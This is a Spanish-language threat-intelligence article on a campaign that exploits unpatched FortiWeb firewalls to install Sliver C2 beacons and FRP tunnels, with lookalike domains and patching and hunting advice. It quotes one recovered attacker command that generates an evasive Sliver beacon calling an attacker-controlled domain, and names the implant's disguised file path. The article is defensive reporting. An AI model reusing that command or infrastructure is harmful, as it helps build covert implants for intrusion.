Una sofisticada campaña está utilizando dispositivos de seguridad perimetral sin parches como cabeza de playa, instalando herramientas de código abierto para mantener un control persistente sobre redes corporativas.
El dispositivo diseñado para proteger tu red podría ser, irónicamente, la mayor amenaza. Investigadores han descubierto una operación activa donde actores de amenazas están explotando appliances FortiWeb (Web Application Firewalls) obsoletos para desplegar Sliver, un framework de Comando y Control (C2) de código abierto cada vez más popular entre los cibercriminales como alternativa al conocido Cobalt Strike.
El Objetivo: Dispositivos de Borde (Edge)
La campaña se centra en la explotación de vulnerabilidades públicas en dispositivos FortiWeb que ejecutan versiones de firmware antiguas (específicamente entre la 5.4.202 y la 6.1.62).
El éxito de este ataque reside en su ubicación estratégica: al comprometer el WAF, el atacante se sitúa en el “borde” de la red, un lugar privilegiado desde donde puede inspeccionar el tráfico, lanzar ataques hacia el interior y mantener persistencia con privilegios elevados.
Herramientas del Oficio: Sliver y FRP
Una vez que logran acceso inicial (posiblemente mediante inyección de comandos o SQLi en versiones vulnerables), los atacantes despliegan un arsenal técnico robusto:
- Sliver C2: Utilizan este framework escrito en Go para generar implantes (“beacons”) altamente evasivos.
- Comando Revelado: Los logs recuperados muestran comandos específicos como: generate beacon –http ns1.ubunutpackages.store –strategy r –template ubuntu –os linux –evasion
- Camuflaje: El implante se guarda en /bin/.root/system-updater y utiliza plantillas para parecerse a procesos legítimos de Ubuntu, dificultando su detección en auditorías de procesos.
- Fast Reverse Proxy (FRP): Herramienta utilizada para exponer servicios locales hacia internet, creando un túnel directo entre la red interna de la víctima y los servidores del atacante.
Atribución y Engaño
Aunque la identidad exacta del grupo no se ha confirmado, la infraestructura de los atacantes revela pistas inquietantes sobre sus objetivos. Se encontraron dominios “señuelo” diseñados para engañar a víctimas específicas en el sur de Asia:
- ns1.ubunutpackages[.]store (imitando repositorios de Ubuntu).
- ns1.bafairforce[.]army (imitando una página de reclutamiento de la Fuerza Aérea de Bangladesh).
Esto sugiere que la campaña podría tener motivaciones geopolíticas o de espionaje estatal, más allá del simple cibercrimen financiero.
Recomendaciones
- Actualizar Firmware: Es vital verificar la versión de todos los appliances FortiWeb. Cualquier versión en el rango 5.x o 6.x debe ser actualizada inmediatamente a las ramas con soporte actual.
- Monitoreo de Procesos: Buscar procesos inusuales en los dispositivos Linux/Unix, especialmente aquellos que se ejecutan desde directorios temporales o con nombres genéricos como system-updater.
- Caza de Amenazas (Threat Hunting): Bloquear el tráfico hacia los dominios e IPs asociados con esta campaña y revisar los logs de salida en busca de conexiones de “balizamiento” (beaconing) cada 120 segundos, que es la configuración predeterminada observada en estos implantes Sliver.
